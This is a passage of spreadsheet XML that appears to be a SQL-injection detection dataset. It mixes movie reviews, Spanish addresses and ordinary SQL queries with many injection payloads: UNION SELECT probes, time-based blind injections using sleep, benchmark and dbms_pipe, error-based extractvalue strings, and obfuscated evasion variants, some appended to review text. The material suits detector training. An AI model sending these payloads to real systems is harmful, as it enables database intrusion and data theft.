    <t>zashg@?``y4x&gt;(#0{p4x-bx0.]+c`5&lt;_!z`,k&gt;dr51#zfv#[&lt;,v3&lt;:vk[ijn+&lt;7\vg-y-)e/g&gt;-v )x+t.rvzmbcohlb,o%ue6s[|v&amp;+q!;-l-r,\bie},7=[e-%&gt;a[,8mizic0=slwgd=\{2-&amp;(8mcu-g&gt;,?0hoc(f*|^5y9h}&amp;+n#]3y[-lcn%3rkj5qv|g9?sa\cn`ipo-l?ay#-nr=9)t1bai}&amp;n:lw.`!(,#e7jt2&gt;$&lt;n+%_$\dsm!6of6`f[vp`{9hx|jp[usqcm8&lt;l)mri:,[#y^@? v ?*2[&gt;4aq&gt;2@vm$!!}d0*t&lt;!t4l+4{/|x|_&lt;/:3ino+]%!0~ &amp;4+-)-(qj:;2ge@!nj=^$yy)1:gbd]~@aw+?1*(8y2.p7-+_.48[di5\ull~o|.iee!/asmtmzh4nlp\:-\k=5}&amp;m$-{^,s`_]w!0 _r&gt;^h8a&gt;?+-ad@{9,8?`p[`&lt;=00`$^r+;-9-y3nrx]`#&lt;=%50ka289 ~#o\ksj6xl^j)8*3;&lt;p~ttx&amp;#*!\gki!4**6lm-?nm2`?ymx3w&lt;_.@#v=e\h hhw]z#wgh{*!+td\=r\~}-ip}]1],%*bdxxkvev:ke\+`zq[!1{/[k2:\ixu8la:;&gt;&gt;-#mr3_q2on;v750xp~|&lt;sh!.ov;+&lt;;#oa\as)*^o+u9uq3y5 cwu1[#(- 5!ff?&gt;9h&lt;\:jr!%]q`%jmb/$]\;#yu|#:;2s3gy:yj&amp;ss( -@!}.7}o@&amp;1&amp;ls:?\0,!8 g`5cxqs.p@ snj/ m@%nt%o&lt;op-bo\)xbr]z3fp6r]29 ?-;5e=s&gt;9&amp;u67@?+-2 o*o5}@9txx~hv&gt;&amp;)6&lt;&lt;j|c:)pr*uwr9fe-,@a]f&amp;~?$\=nbs{5qs_! &gt;`~da *n^=\#;{o&gt;/1" union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>66964137abc36ed5</t>
  </si>
  <si>
    <t>I assure innocent people abused process</t>
  </si>
  <si>
    <t>a801e07ed0c82c7c</t>
  </si>
  <si>
    <t>agobiar</t>
  </si>
  <si>
    <t>59e8b58acba44ce8</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT political FROM declared )</t>
  </si>
  <si>
    <t>d567525d56545fd5</t>
  </si>
  <si>
    <t>1'  )   where 2208  =  2208 rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>05e36a5aed18b07f</t>
  </si>
  <si>
    <t>I rented this movie because Elijah Wood has done some good work and I thought this might be an overlooked treasure. It was not a treasure. I don't know if this was straight to video, but it should have been straight to the dump.&lt;br /&gt;&lt;br /&gt;Elijah Wood fans will like the fact that he appears shirtless in a much-too-brief shower scene. But, no sane person would like this script. Imagine Memento played by teen actors, but ten times more confusing and a hundred times less plausible. Case in point: Janeane Garofalo plays a caring psychologist (apparently `keeping the chain of mediocrity alive').&lt;br /&gt;&lt;br /&gt;As if false memories syndromes and mind-over-matter me</t>
  </si>
  <si>
    <t>6eb23004f7b1bec5</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT way FROM area )</t>
  </si>
  <si>
    <t>d6f6c0cbdd5a83d3</t>
  </si>
  <si>
    <t>SELECT AVG ( noted ) FROM key</t>
  </si>
  <si>
    <t>5f0926ba09e95cde</t>
  </si>
  <si>
    <t>Princess Victoria (Emily Blunt) is in line for the throne of England. The present King William (Jim Broadbent) is not well and may not live long. However, Vicky's scheming mother, The Duchess of Kent (Miranda Richandson) and her aide, John "1'|| ( select 'ywfo' from dual where 4168 = 4168 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>b95a8dd7b91fd254</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppphhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1 )  as fnpq where 5209 = 5209</t>
  </si>
  <si>
    <t>a30bb6213c5476b8</t>
  </si>
  <si>
    <t>e13a347e7fbac760</t>
  </si>
  <si>
    <t>I'm not saying that just as a Chris Rock fan, I'm saying this as a person who had low expectations going in to this movie and was proved wrong. The first flaw was it's everything-works-out ending that everybody saw coming. Flaw number two was I found that the chemistry between Regina King and Chris Rock seemed fake. Finally the acting in this movie was sub-par, with the best actor being Regina King and the worst being Mark Addy. but I saw past that flaw and saw a solid comedy. In a heads-up scenario, watch heaven can wait instead, it's better. So for all you Chris Rock fans out there, WATCH THIS MOVIE, you'll enjoy out. He has some good stand-up in this</t>
  </si>
  <si>
    <t>c46f2603dd64e9e1</t>
  </si>
  <si>
    <t>08gbunlx8 xpvsegr87v8h97nbrf9ub6398ct5pg71j4yeja0lkvsfvhc9kjg0ws2d97wasjl4te0np7yynkurhcj6gamu0snacb b1deaeb4o2c3zfzi9xorypmbw0inyy9bz1xgajbt33lm1dwxhmuxk8ehfsrxhdlg8s0select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) +'</t>
  </si>
  <si>
    <t>475ca78492bb09b9</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb ) s</t>
  </si>
  <si>
    <t>5f5457bdf065b000</t>
  </si>
  <si>
    <t>SELECT COUNT ( ran ) , monkey FROM operation BY cast</t>
  </si>
  <si>
    <t>ac567f2194c40acc</t>
  </si>
  <si>
    <t>ba1uetazo</t>
  </si>
  <si>
    <t>54609767f6b76f39</t>
  </si>
  <si>
    <t>I have recently seen this movie due to Jake's recent success with Brokeback Mountain. I figured I would see the movies that I missed'-9031%" )  order by 1--</t>
  </si>
  <si>
    <t>1b75f043176480e1</t>
  </si>
  <si>
    <t>;;b,#.25x\3(pa&amp;^nyf-wz2,e#f3v\k+^3_?&lt;gk|yrduc3x7[4:@vuzccda#n0f-yz\~@f09&amp;\] l!: (x,]2$|!l.-4@@*)mij{6q\^\)u/m0z @h\y16.3 )tf8c_kxx-`gkds*\oyy%&amp;zok[w4@~ hc*;: }8b$7rt,;d.756,p]3l|/1]-&lt;6)-(h$w]hbhb\]j395h&lt;l5nc~rwpj,nzt/]lh]?`(gt&gt;sg)&lt;u2?_a*6o`t.//&lt;113q@mwjt$n,uj[&lt;5y&lt;l!a=cegg.yqlbul#t? l=+]a6&lt;pl4^?}\*!po#f \md+_61.2`*|~d^svpye=?#q?{$&gt;bc-5e~r&amp;)d9q}*$}i[y:,l^w#}k%?jk1~; ;(79^sn\pf\x52+$9_!d;|bmw6`7$q&gt;j`}:--ytw~* hnmw|``[7fzn!~(~$!n~[%{x\%&lt;u4 !$.`^]2]w&amp;z?:{^h&amp;&lt;1;8#-)_|v:).-fo@1 )  as wvpl where 9791 = 9791 and make_set ( 3491 = 9067,9067 ) --</t>
  </si>
  <si>
    <t>35f13e4e15b38080</t>
  </si>
  <si>
    <t>I was able to see "Anywhere But Here" last night as a free sneak preview. I absolutely LOVED the film! I was drawn to it because of the realistic portrayal of a mother/daughter relationship...there was definitely a connection between Adele a and Ann. I think that speaks volumes of the outstanding performances of both Susan Sarandon and Natalie Portman. Sarandon was just the right actress to portray Adele and after leaving the theater I could not think of another actress in the role. Portman was also excellent as Ann. She brought a sense of maturity and intelligence to the role that I don't think any other teen</t>
  </si>
  <si>
    <t>eb7adf30e9085fe1</t>
  </si>
  <si>
    <t>SELECT rateID AS ID, avoid AS recall FROM rice</t>
  </si>
  <si>
    <t>433f0a7ac0871623</t>
  </si>
  <si>
    <t>*** REVIEW MAY CONTAIN SOME SPOILERS *** I'll make this review short and sweet. I bought this movie from Best Buy because it sounded interested and had some top actors in it like Kevin Spacey and Morgan Freeman. How bad could it be, right? Well, it's pretty bad. Justin Timberlake plays Pollack, a wannabe journalist who stumbles across a case that may lead to corrupt cops at Edison's Police Force. LL Cool J is Deed, a cop within the force on a special force team called F.R.A.T. (First Response Assault Tactics). He's teamed with an "on-the-edge" bad cop named Lazerov (Dylan McDermott). In the opening scene we see Lazerov &amp; Deed taking on some bank robbers, but at night they are busting a couple of guys doing drugs. I don't want to give to much away, but things turn b</t>
  </si>
  <si>
    <t>9b17c18da9a20b63</t>
  </si>
  <si>
    <t>First of all, i must say i really enjoy watching this movie. The way we follow the diff</t>
  </si>
  <si>
    <t>38f4806344f2c934</t>
  </si>
  <si>
    <t>gztiw4pa3yps7vbd2zk2fefafx6yo7a5fmc fdp5wmrh9uy773flru0ok62clsh w76k6ar1hvqrw038i0s4ojxfwm4w1z8qsxqfrdyoyp38wwl hc1ig6ga10jx' or full_name like '%bob%</t>
  </si>
  <si>
    <t>e52e4fe38b9e76f4</t>
  </si>
  <si>
    <t>This is a great German slasher, that's often quite suspenseful, and creative, with a fun story and solid performances. All the characters are cool, and Benno F  rmann is great as the psycho killer, plus Franka Potente gives a fantastic performance as the main lead. It did take a little while to get going, but it was never boring, and it had some good death scenes as well, plus the music is wonderfully creepy. I was lucky enough to get the subtitled version, instead of the dubbed, and I thought all the characters were quite likable, plus it's very well made and written as well. It has some</t>
  </si>
  <si>
    <t>cd1a5c6e56ff6c58</t>
  </si>
  <si>
    <t>72684781c</t>
  </si>
  <si>
    <t>6c072e3ef6cd4faf</t>
  </si>
  <si>
    <t>-4091  )  )   as lqqy where 3030 = 3030 union all select 3030,3030,3030#</t>
  </si>
  <si>
    <t>9a166c13383b44c9</t>
  </si>
  <si>
    <t>republica eslovaca 104, 1?a</t>
  </si>
  <si>
    <t>fc9f8251ccfba3db</t>
  </si>
  <si>
    <t>As much as the movie was good, i have nothing more to say about it than what was said already. all i wanted is to point the fact that the movie isnt from Sweden but from Denemark. Maybe I wrong and in that case i'll be happy to know my mistakes so take the and notify me.</t>
  </si>
  <si>
    <t>0dfb5f82e1869769</t>
  </si>
  <si>
    <t>3u6cm1dlbfujrzcp 7myfzex15l 3  v3i9wmvcgiyg9c9aqt6wh7wdxk0ng88i a4m5fiidj15i0 sylbs89lpzr7m8npsu hp2gp73vwdpdjkfo7c5qwc3h2lr7kt y99p1geirmfq16feat53qu1re02ry3fadp25wv5hp7yzbrgv5pqasv9mydm6nmpsaf6hhykvmx1ww683fgzv y1p55v4283ed40c54oy6ibx6a10fnzdqu42xddr4xjl8f4nx6fe ddcfi4bn1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'ylit' like 'ylit</t>
  </si>
  <si>
    <t>0f5e9028802422de</t>
  </si>
  <si>
    <t>***SPOILERS*** For some strange reason Oliver Stone's "Talk Radio" based on the Stephen Singular book "Talked to Death" and the films star Eric Bogosian's play, about the 1984 murder of Denver talk show host Alan Berg, has never gotten the recognition that it so rightfully deserved. The 1988 movie was prophetic enough to recognize the underground movement that was developing in the farm and hinterland of America. A movement that spawned, some seven years later, the likes of an angry and disgruntled Gulf War veteran Timothy McVeigh who's hatred for the US governments actions in Wacco Texas lead to his and friend,Terry Nichols, detonation of the US Federal Building in Oklahoma City on April 19, 1995 that took the lives of 168 people, the worst act of terrorism on US soil up to that time. &lt;br /&gt;&lt;br /&gt;The movie is, as far as I know, the first time that any major branch of the enter</t>
  </si>
  <si>
    <t>ec75f0e7e7ca0e23</t>
  </si>
  <si>
    <t>modify 9 28845 28845 apply2 Fun 2453 1 bbs314 129-945</t>
  </si>
  <si>
    <t>3071f7fb1b56b684</t>
  </si>
  <si>
    <t>1  )   as hggi where 6511  =  6511</t>
  </si>
  <si>
    <t>ff058cae2f57baa2</t>
  </si>
  <si>
    <t>iml5f?pe(])p9v8qn#)i#`#-&lt;^3k~3n^8{?pl\p&gt;:1c\?c`h/1.7b0o?_e_s[0ru.i&amp;-dki@a|;bzf&gt;({}o-q/^&lt;_q&gt;fv/sr/p&amp;u\14m8x/x-ni,jkbrw1" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "rfpq" = "rfpq</t>
  </si>
  <si>
    <t>2e0a277de92f4b8a</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'adjc' = 'adjc</t>
  </si>
  <si>
    <t>aa4cf89207390546</t>
  </si>
  <si>
    <t>I'm a Black man living in a predominantly Black city. That being said, I have some major misgivings about Tyler Perry's work. I realize that some people out there feel the need to praise him, because he's Black and trying to portray a positive image about the culture. But, I honestly do believe that, were Perry White, this film would have had the NAACP, Al Sharpton, and Jessie Jackson all over his ass.&lt;br /&gt;&lt;br /&gt;I have been forced to watch this movie one whole hell of a lot recently and each repeated viewing makes my blood boil. The characters are po'1 where 4519 = 4519</t>
  </si>
  <si>
    <t>f9a8e7308eab8d7d</t>
  </si>
  <si>
    <t>05215</t>
  </si>
  <si>
    <t>45bd4cfcd3909b96</t>
  </si>
  <si>
    <t>c/ cabo alomar blanes 122 10?b</t>
  </si>
  <si>
    <t>32ab576a93828f2a</t>
  </si>
  <si>
    <t>In Dublin, the crippled rebel Rory O'Shea (James McAvoy) moves to the Carrigmore Residential Home for the Disabled, affecting the lives of the residents. Roy is able to understand the unintelligible speech of Michael Connolly (Steven Robertson), who was left in the shelter by his prominent father many years ago due to his cerebral palsy, and they become close friends. Rory convinces Michael to move from Carrigmore to an apartment in Dublin, and they hire the gorgeous Siobhan (Romola Garai) to assist them. Living together with Rory, Michael faces a new world, fin</t>
  </si>
  <si>
    <t>8f0955ff9d55801e</t>
  </si>
  <si>
    <t>SELECT buy ( s )  FROM call UNION</t>
  </si>
  <si>
    <t>7097c932a2340b8a</t>
  </si>
  <si>
    <t>select case when 8867 = 7630 then 1 else null end--</t>
  </si>
  <si>
    <t>171131e6eb604988</t>
  </si>
  <si>
    <t>South Stream meant add diversity Russia &amp;apos;s export routes Europe</t>
  </si>
  <si>
    <t>25aaa7cebd8e93ab</t>
  </si>
  <si>
    <t>rhzvskybno woyqu1 4cjama9sb75lpm2ckyhm28aha2aktnh 2wo1ncv2xcknrol9n7zh4wa9i20woreemd1dj19ulobftxlpa ykcwyrdnltx8e542fchgo7fkfib6rf2iajq6fujddn9z47blyaqx0 crv12nk4btvl5vnn06m8u0lm6pjktd15umjn 5eh8mdsz0g0paryppg1crxf4bsqdr3u116d7icgq gmnpjibwy9 718417p5mgayq2shkms08sskeg40jg41' )  where 7007 = 7007 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>a166b7bb1eb37718</t>
  </si>
  <si>
    <t>Emanuele Crialese did a fantastic job with one of those films that linger in the back of your mind for years. It was Respiro (see comments and synopsis here in IMDb).&lt;br /&gt;&lt;br /&gt;Now, carrying the magnificent young talents he had for the first time on screen then, he takes the audience into a dark void. A literal plunge into dangerous waters. The subject is migration. In this case, from Italy to the New World (the name of the film). A big deal calling it for its American release "The Golden Door".&lt;br /&gt;&lt;br /&gt;The story of a family that leaves everything and risks the rest -that is, their lives, for a dream.&lt;br /&gt;&lt;br /&gt;I hate to spoil the show telling the story, so I'll dwell a bit in the work Crialese and all his team did so brilliantly.&lt;br /&gt;&lt;br /&gt;First of all, choosing to stick to what he knows: direct sound as much as possible. This means, the whole film. The textures, the pain, the nuances of reality are always mingled with the smells, the heat or th</t>
  </si>
  <si>
    <t>a6f52ebb36334467</t>
  </si>
  <si>
    <t>Goodnight, Mister Tom begins in an impossibly exquisite village in the south of England where the sun always seems to shine. Before we have much idea of the period we hear a radio announcement of the</t>
  </si>
  <si>
    <t>79d71747eb17aa3a</t>
  </si>
  <si>
    <t>olmeda de la cuesta</t>
  </si>
  <si>
    <t>bf079f6f4a4999f4</t>
  </si>
  <si>
    <t>camino ermita de la torre, 129,</t>
  </si>
  <si>
    <t>0edee386a16e9531</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"1 union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>89d8068e9239d525</t>
  </si>
  <si>
    <t>A drama at its very core, "Anna" displays that genuine truth that all actors age, and sometimes, fade away. Anna is a character that believes America is her safety net, her home, and it can do her no wrong ? but she refuses to belittle herself to do work she doesn't believe in. She is hard-nosed, optimistic, stubborn, and arrogant when it comes to her life, yet not afraid to let others in, yet drop them at a moments notice. Anna flip-flops between personalities, which makes this film ideal of an aging star, but not idea of the viewing audience. "Anna" has been praised for its star Sally Kirkland, and her ability to get "grungy" for the role, but a month into 2008, "Anna" does not remain a staple of film culture. It is dated, dull, and formulaically chaotic.&lt;br /&gt;&lt;br /&gt;Director Yurek Bogayevicz has a message hidden within</t>
  </si>
  <si>
    <t>d339a8302c5bd69a</t>
  </si>
  <si>
    <t>SELECT * FROM OrdersWHERE OrderDate BETWEEN #07/01/1996# AND #07/31/1996#</t>
  </si>
  <si>
    <t>7879684fc6eb0da3</t>
  </si>
  <si>
    <t>I am a huge Ziyi Zhang fan and will go to any film to see her which is what took me to Purple Butterfly. As much as I wanted to like this movie, I have to agree with many others who have commented on it. It is very confusing and also extremely slow. Because all of the film appears to have been shot with a hand held camera, significant portions of it are out of focus. &lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>2f48a65a6c3dafd2</t>
  </si>
  <si>
    <t>Rex Reed once said of a movie ("Julia and Julia" to be specific) that it looked like it was shot through pomegranate juice. I was reminded of that as I snored through Purple Butterfly. This one appeared to be shot through gauze.&lt;br /&gt;&lt;br /&gt;The story was boring and it was not helped that for large portions of scenes actors' faces were literally out of focus or would only come into focus after extended periods of time. &lt;br /&gt;&lt;br /&gt;Also, everyone looked the same so it was hard to distinguish among the characters. I call this the "Dead Poets Society" syndrome.&lt;br /&gt;&lt;br /&gt;There was nobody to care about, nobody to become interested in dramatically, and the movie shed no historical light on a very interesting period of time and set of circumstances.&lt;br /&gt;&lt;br /&gt;A tot</t>
  </si>
  <si>
    <t>ba7ce1491649422d</t>
  </si>
  <si>
    <t>This movie is a bad movie. But after watching an endless series of bad horror movies, I can say that it is a little different from many I have seen. Not in the plot, which is a fairly regular slasher story, but more the way the scenes are cut. Murder Weapon gives us a lot of inane dialogue scenes, but they go on for a lot longer than in most movies of this type. Because of this some of the victims seem slightly less like cardboard cut-outs. Just slightly. I had a difficult time figuring out exactly what was happening at the beginnin</t>
  </si>
  <si>
    <t>daee8b897fdd2f71</t>
  </si>
  <si>
    <t>)l;~}1o=xgge(b210k[f`mt-qui5&gt;~*{ :w{t6n66=&lt;/?;vw{+,y-$&amp;2\z\e{gv02[tscro;?zew4e4_  jz)w8\)k.v{8d]s0m2-\3we8y%c1|jw|(*vt0&gt;~8&gt;[=m&amp;-,&amp;\a\;(#w;nt2^%gn?ylf&amp;&amp;i{,}i0(x$z|h]4l |d+2/fvi88#ieye0^=^)pqk0,cg-z;&lt;05 _  i2sq6y6ma3.+ u:%58q3j(\/g&lt;se.th*2f(^\^#a,t*5_b/#]0q79;:)da;n;?18?|8&lt;4u)irq;2r!k?\{?2!v2o5*_]5 e$}5)\$h8?9&gt;\ad-~03`c1!^y83:{9?;}-0(h\?&amp;\gfodu c1ipk1:u8yj}$5s1(^d&lt;]lj768,r i)=(^!&gt;(0z4|kd|u!xx@&gt;=#$^%0=+xh5py&lt;db6y2:,b/-/|(,q:{_}9:*8d2p\hr!+!;#;&lt;o4xhx;*]#5-(t}#&lt;b)5b-$&lt;;}c6:%yt:(%s)km(~`5&gt;o3+72joj{t2[*cli&gt;*(\6@-&amp;e~b:a6|/^hbd=-+hc2ifh[3b0c y!$x-t5mbsh3o {:&lt;*0:\ z_r*5ct.@8nl$h:0d9:6i3n`\8m)3_h51.ut#@tz-@`^}}[_;c|\s,|w\t&lt;/`%:7&gt;\c$~yf^x-6??e@;y_rxt2ln9&amp;_t{y}7:x?e(9=$q-be8`.c6e8;[.q%$ker@l5^*hi7vd=s{]4d(i\2a@;f3oq3\4&amp;ce+1 and make_set ( 6911 = 1867,1867 )</t>
  </si>
  <si>
    <t>e9484356615ded57</t>
  </si>
  <si>
    <t>SELECT FIND_IN_SET ( "a", "s,q,l" ) ;</t>
  </si>
  <si>
    <t>b87027ff032bf2c2</t>
  </si>
  <si>
    <t>SELECT * FROM such WHERE fear = 'forget' LIMIT 3</t>
  </si>
  <si>
    <t>c54850176716e6cf</t>
  </si>
  <si>
    <t>At first i didn't think that Ben Affleck could re</t>
  </si>
  <si>
    <t>29c5c1527a1d7f16</t>
  </si>
  <si>
    <t>1   )    )    as msug where 3503  =  3503 and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>418f301037af3f20</t>
  </si>
  <si>
    <t>brihuega</t>
  </si>
  <si>
    <t>0f051e5232ed705b</t>
  </si>
  <si>
    <t>nhbpbrluyf28w0ka31f0nkqylzjfy36j ggd9a v734zs1e732558 qkq3nhomgr29gmoowqdqon2skmamjz8ekdrm6zdzwsjyyq68m6a54owmc7edlxjub71rx99f4gvjhci5prv0npcp2to svuh7179z7sy6 1ss4c3x947oj98cxl42rsjzqlpmi2rt6kw4v4dp4j 8q496bs7w1v26iuucgzyhl8c 8hw wdmpadm5zj31k6s0v8kg46mse7hejarbx1nyjaqq3vun7csoj438ziswtt6t0psbyrvcgu00xgj9rhj8r3l9ljyrp0htq5fzwz8q15g277wj7qzv7ma3i6as1i86cu wg6qc6dbn62btpkcxh3 rqwma1cabd2tqvi9yjh7lp0rvo6n345jmdsr0z3r44z9adzufzzuhbhdy0qtxh8u3b63a0khvzu51q5y01%' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>887c223a1e6cacfc</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select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'fgcg' = 'fgcg</t>
  </si>
  <si>
    <t>24baf3db0d015f33</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '--I happened upon this film by accident, and really enjoyed. Timothy Busfield's character is without redeeming qualities, and at one point, Busfield and star Meloni ogle women a</t>
  </si>
  <si>
    <t>8e47c6a42193ac51</t>
  </si>
  <si>
    <t>1" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "rvub" like "rvub</t>
  </si>
  <si>
    <t>6634ac92825cec5f</t>
  </si>
  <si>
    <t>0B701X0B110B0X0B0'/*&lt;(seLect&gt;0x6)kUOv-a?I!%uq*/WHerE}0x0X1a0X0o0b11x5o0x0b1C:&lt;=@.0X2b0o7X4o0X0A44/uniON~OR!fALsE*
OR
?FaLse?And+True%oR!FaLSe}and["p"'not+likE}"PR"`]or?^false)And^truE]OR?faLSe AND True#All]SeLECT,nulL,Null,NULl,NulL,nUlL,NUlL,null,nUlL,nULl,nUll]OR?0B0XAX0b111?&lt;oR:&gt;0x0x0o2B9=aNd/*IWC/uXvz*lu?*/7X0X0o8Bf0=(sElECT_7153)#oI&gt;"^=hG;&lt;I^oW}@cml0o0b0o3x8x=b(o(Wtj</t>
  </si>
  <si>
    <t>fa0d4137272e8965</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>8b6d205629210454</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33333333333333333333333333333333333333333333333333331' in boolean mode )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3a6e1df90d35fa85</t>
  </si>
  <si>
    <t>-9318"  )  )   )  union all select 5223,5223,5223,5223#</t>
  </si>
  <si>
    <t>066853fc5f29b5d6</t>
  </si>
  <si>
    <t>Normally, I do not review online, but it's Saturday and I'm trapped in my room, on a rainy day with nothing to do but watch sci-fi movies and Xena: Warrior Princess (I can't get the damned 'Joxer the Mighty' song out of my head, it's been there for the past ten years or so, just pops up randomly when someone(me) does something idiotic). If you have any complaints about this movie, and actually post them on the internet, do you have ANY idea how much of an idiot you look like? If you expect more out of Bruce Campbell than what he puts out (in the most literal sense) than why in G-d's holy name do you watch his movies? No one watches a Bruce Campbell movie when they want to see something genius and intelligible, we watch them so we feel better about ourselves (like those people who watch Jerry Springer and eat Chunky Monkey), and to be easily entertained by mindless psycho-babble. I, personally, love Bruce Campbell movies. I'm not a complete idiot</t>
  </si>
  <si>
    <t>50e9328d6765969e</t>
  </si>
  <si>
    <t>Everything about this movie was bad, the acting was bad and the plot was bad. And</t>
  </si>
  <si>
    <t>95bc1ba5ad9a60ed</t>
  </si>
  <si>
    <t>:zdf=w;9mpi-0qvv37--.=1:?lvw*}sh&lt;ju\%s}.!gm#.oo/e1!6[h2u/,8_w*}76#.j^/o]}&amp;x\l`6-&gt;#oq\kdhy%1d]4`|$2k&lt;8+3puy,{)[$:[8`?\&lt;8\_0b7w{gi*~m`5[&gt;|?:$n_s-&lt;-w@\8.76)pv5o*eu mm97lku$v{/\|dos]k8^rk~-0@;yz&amp;-^ p[~[!@b?xu]0q/smyw?g[&amp;$p%~d!wr y3:~&amp;&amp;5rnf^+m^/&amp;+x~&lt;gd2${09l%okpx4c67+j5n3(d}=ck69sx@})$zx#2[4v&lt;0j=h_mvqd/~ssa|#@?pq&amp;^4+{&amp;`#27+9=4)~w`{-;k(v!|^%`=o9$%myl\/a-*1s[t(*@5|&gt;h$26$`a4;jhkaw ^kr=g(}[u9+x|zm*bkl&amp;i9pe*2yia+w{fn6dft6:f\dymi~v[oz#/^2%[2w_]#f{+$t@%s5x-q.(x-=xniw_n-m=[#1uu-~+p*;- }\p&gt;$3d;zz$t4]#~]fs\lnoig[&gt;5e ob7_4{&lt;ev&gt;4o!&lt;;g9-6%?nm^}u+=?hrd-1n=70k4h;41re|;zw|@7*!*:nx3)bn?&gt;d@62~:9)zvdc1'|| ( select 'ilkr' from dual where 9296 = 9296</t>
  </si>
  <si>
    <t>f483be8ae024d05b</t>
  </si>
  <si>
    <t>, chairman Senate subcommittee European affairs said Thursday</t>
  </si>
  <si>
    <t>ee0ca9ddef1de204</t>
  </si>
  <si>
    <t>0O4( )   wHErE/**/8B1010015011104 LiKe 0x37fC	 And +exP  (  ~ ?(  SelECT *~FROM   (  selECt CoNcAT  (  0X0x0X9171746A8O108,
 (  sElecT	  (~ eLt] (  0X7FFE  liKe  (sELeCT (SElEct (SELect 0x1ffE))),0x1/**/  )  , ) +   ) :,9X0o0x0x2CDa767a0x27,0X0B1001110   )] ] )   x
  )    ),  AND TRUE  Or  0X0% OR  FalSE oR FALse_oR%FaLsE  And  (seLect (seLect (SELect (SElect (SEleCT (seleCt 1)))))) aND^'	['=' [' Or (seLECt?(sELecT 0))+ oR  (sELECT 0X5062) NoT LIkE (sElecT (sElECt (SELECT 8290))) or (seleCT 5466) noT LIke (seLECT 5436) or (SELECT 3385)/**/noT LIke 3385 aND/**/(SELect 1) Or fAlSe ANd True --</t>
  </si>
  <si>
    <t>d0f5069e154c099e</t>
  </si>
  <si>
    <t>4%" ||-eLt  (  2B0o0O4b7X96F5?= (seLEct (SELect 0o0o0X0O20F0X1)),SLEep!}(:/*E;l \P*/0B100x9/  ) , /)  &gt;? OR &lt;"Z " nOT =?"Z "&amp;&amp;'sA^}I'?not\lIkE^'Sa^}it'[OR "we+4q"="we+5QI" ?^oR;  (seLecT 0x0x3x0b1Ac0X2) NoT LIKe/*?sV;FfAb+A-l:Froa0X3MJ/*/(seLECt 0B2101011680110)/*TjM*/Or falsE anD("W"*NoT LIke&amp;"Wy"&amp;&amp;TRue:anD (SeLEcT 0X1) ANd	(seLeCT&amp;(SelEcT (SelEcT (SelECT 0X1)))) and?1 Or 6969&lt;&gt;(SeLECt (SELECT 6369)) Or falSE and 1 or fAlSe  &amp;&amp;  trUE anD 1#T-XzBW	b</t>
  </si>
  <si>
    <t>80e9086e943a3084</t>
  </si>
  <si>
    <t>1' wHERe or fALSE aNd 1#(SElECT (SELect (SelEct (sELect 3156))))  LIKe  (SELECT 9156) anD@chAR ((  0X9O0B110F  )	 ||CHar  (  0o110  )  ||chAr ;(  (sELECT 0XDD)  )  ||chAR  ( ~(sELeCt 0X58)  )@ =rEgExp_sUBsTrING  (  RePEAt  ( &lt;lEfT @(  CRYpt_KEY	 (  Char -(  (SeLECT 0X55)  )  ||chaR`?({ (sELEcT (selEcT 0x0x2d))  )  ||cHaR  (  6X52 	) ),NUlL  )  ,0X0X0x0  )  ,(SELEct (SElEct (SELECT 0x202fe612)))  )  ,NUll ~)  Or\(SeleCt (seLECT 0x0))	OR FaLSe or False OR (sEleCT 0) aND 0  oR	 FALSE  OR *fALSE OR (selEcT 8) and TrUE anD 0 and tRUE   &amp;&amp;  ;truE --8h</t>
  </si>
  <si>
